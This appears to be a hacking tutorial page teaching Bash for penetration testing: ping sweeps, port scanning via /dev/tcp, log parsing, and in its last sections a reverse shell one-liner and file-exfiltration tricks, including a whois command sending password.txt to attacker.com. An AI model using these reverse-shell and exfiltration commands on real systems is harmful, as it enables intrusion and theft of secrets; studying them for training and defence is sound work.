Bash Scripting for Hackers - WhoisNexus Academy

If you can't script, you are a "Script Kiddie". Dependency on GUI tools makes you slow. When you land a shell on a minimal Linux server, `git` might not be installed. `python` might strictly be v2. But Bash is always there.

The Philosophy of Pipes

Linux tools do one thing well. We chain them with `|`.
grep (Filter) -> awk (Extract) -> sort (Order) -> uniq (Deduplicate)

1. Reconnaissance Loops

Don't ping manually. Use a `for` loop.

# Ping Sweep the Subnet
for i in {1..254}; do 
    ping -c 1 -W 1 192.168.1.$i >/dev/null && echo "192.168.1.$i is UP" &
done; wait
        

2. Port Scanning without Nmap

You land on a server. You are not root. `nmap` is not installed. How do you scan the internal network?
Bash's `/dev/tcp` file descriptor.

# Scan ports 1-1024 on localhost
for port in {1..1024}; do
    (echo > /dev/tcp/127.0.0.1/$port) >/dev/null 2>&1 && echo "Port $port is OPEN"
done
        

This works because Bash treats `/dev/tcp/HOST/PORT` as a socket. If the connection succeeds, the port is open.

3. Log Analysis (AWK & SED)

You just downloaded a 5GB Apache log. You need to find the top 10 IP addresses.

# Column 1 is usually the IP
cat access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10
        

SED (Stream Editor): Quick find/replace directly in the stream.

# Extract all emails from a file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" data.txt
        

4. The Reverse Shell

The most important line of Bash you will ever learn.

bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

Explanation:
bash -i: Interactive mode.
>& /dev/tcp/...: Redirect STDOUT (Output) to the socket.
0>&1: Redirect STDIN (Input) from the socket.
Result: The attacker sends commands into the socket; Bash runs them; output goes back to the socket.

5. Data Exfiltration

How to steal a file without `scp` or `ftp`?

5.1. Base64 via Clipboard

# On victim
cat secret.zip | base64 -w 0
# Copy the massive text blob.

# On attacker
echo "Blob..." | base64 -d > secret.zip
        

5.2. Whois (Weird Trick)

If outbound port 43 (Whois) is allowed through the firewall:

# On victim
whois -h attacker.com -p 43 `cat password.txt`
# On attacker
nc -lvnp 43
        